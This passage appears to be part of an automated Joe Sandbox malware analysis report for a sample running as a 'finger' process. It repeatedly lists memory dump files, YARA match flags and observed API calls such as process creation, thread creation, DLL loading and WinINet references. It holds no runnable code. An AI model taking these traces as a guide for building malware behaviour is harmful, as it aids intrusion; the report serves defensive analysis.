• Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
• Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
• Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
• Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

[Control-flow graph figure not reproduced; legend: Executed / Not Executed]
APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559

Control-flow Graph

APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559

Control-flow Graph

[Control-flow graph figure not reproduced; legend: Executed / Not Executed]
APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559

Control-flow Graph

APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
• Sleep.KERNELBASE(000007D0), ref: 02F63F8B
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F54992
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F54992
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,02F5870E,00000010,?,?,?,00000044,?,00000010,02F5870E,?,00000000,?), ref: 02F69D60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F49E25
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F49E25
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,02F54185,000000F4), ref: 02F69CAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(02F51DE9,?,02F65BF3,02F51DE9,02F65AAF,02F65BF3,?,02F51DE9,02F65AAF,00001000,?,?,00000000), ref: 02F69C5C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F5877C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02F520E0,02F683EF,02F65AAF,02F520B0), ref: 02F58573
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02F520E0,02F683EF,02F65AAF,02F520B0), ref: 02F58573
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472